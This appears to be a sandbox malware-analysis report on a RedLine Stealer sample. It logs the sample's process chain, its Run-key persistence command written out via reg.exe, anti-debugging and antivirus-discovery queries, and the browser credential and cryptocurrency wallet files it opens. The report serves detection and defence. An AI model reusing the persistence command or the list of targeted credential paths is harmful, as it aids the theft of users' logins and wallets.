                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477
                                Source: embedded.exe, 00000007.00000002.2882222148.000001A0B8B6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrrCP
                                Source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                                Source: AnyDesk.exe, 00000010.00000002.2888492265.0000000001D88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}00bo
                                Source: SysrI6zSkJ.exe, 00000000.00000002.2881984710.00000231D6D3C000.00000004.00000020.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1829531012.0000000006C37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
                                Source: C:\ProgramData\WinNet\gg.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeCode function: 18_2_065477A0 LdrInitializeThunk,18_2_065477A0
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C45F8C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_69C45F8C
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C49E6A mov eax, dword ptr fs:[00000030h]19_2_69C49E6A
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C4B428 GetProcessHeap,19_2_69C4B428
                                Source: C:\ProgramData\WinNet\gg.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C40FC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_69C40FC3
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C45F8C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_69C45F8C
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C414B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_69C414B2
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: page read and write | page guardJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exeJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\embedded.exeJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbsJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WinNet\embedded.exe C:\ProgramData\WinNet\embedded.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" Jump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exeJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\AnyDesk.exeJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\WinNet\p.vbsJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WinNet\AnyDesk.exe C:\ProgramData\WinNet\AnyDesk.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\WinNet\gg.exe "C:\ProgramData\WinNet\gg.exe"
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C5F711 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_69C5F711
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C4168B cpuid 19_2_69C4168B
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: IsValidCodePage,GetLocaleInfoW,19_2_69C5AD29
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: EnumSystemLocalesW,19_2_69C4EC36
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: EnumSystemLocalesW,19_2_69C5AFB1
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: EnumSystemLocalesW,19_2_69C5AF66
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: GetLocaleInfoW,19_2_69C5AEBD
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: GetLocaleInfoW,19_2_69C4F15E
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_69C5B0D9
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: EnumSystemLocalesW,19_2_69C5B04C
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: GetLocaleInfoW,19_2_69C5B329
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,GetLocaleInfoW,19_2_69C3D200
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: GetLocaleInfoW,19_2_69C5B559
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_69C5B452
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_69C5B626
                                Source: C:\ProgramData\WinNet\AnyDesk.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeQueries volume information: C:\Users\user\Desktop\SysrI6zSkJ.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeQueries volume information: C:\Users\user\Desktop\SysrI6zSkJ.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeQueries volume information: C:\Users\user\Desktop\SysrI6zSkJ.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeQueries volume information: C:\Users\user\Desktop\SysrI6zSkJ.exe VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeQueries volume information: C:\ProgramData\WinNet\embedded.exe VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeQueries volume information: C:\ProgramData\WinNet\embedded.exe VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeQueries volume information: C:\ProgramData\WinNet\embedded.exe VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeQueries volume information: C:\ProgramData\WinNet\embedded.exe VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\embedded.exeQueries volume information: C:\ProgramData\WinNet\gg.exe VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\ProgramData\WinNet\gg.exe VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\ProgramData\WinNet\gg.exe VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\ProgramData\WinNet\gg.exe VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                Source: C:\ProgramData\WinNet\gg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Users\user\Desktop\SysrI6zSkJ.exeCode function: 0_2_00007FF6F6DA3D00 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6F6DA3D00
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C505C6 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_69C505C6
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C32A20 GetCurrentProcess,GetModuleHandleW,GetProcAddress,GetVersionExW,GetNativeSystemInfo,GetModuleHandleW,GetProcAddress,19_2_69C32A20
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: gg.exe, 00000012.00000002.1804484350.00000000016F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected RedLine Stealer
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.embedded.exe.1a0bad00098.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.embedded.exe.1a0bad00098.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.gg.exe.7a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.2883966376.00000231D8F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.1640888434.00000000007A2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1935874670.0000000003185000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: SysrI6zSkJ.exe PID: 6472, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: embedded.exe PID: 6904, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: gg.exe PID: 6160, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: gg.exe PID: 2228, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\WinNet\gg.exe, type: DROPPED
                                Found many strings related to Crypto-Wallets (likely being stolen)
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLR^q
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLR^qL
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,^qdC:\Users\user\AppData\Roaming\Binance
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q&%localappdata%\Coinomi\Coinomi\walletsLR^q
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Tries to steal Crypto Currency Wallets
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
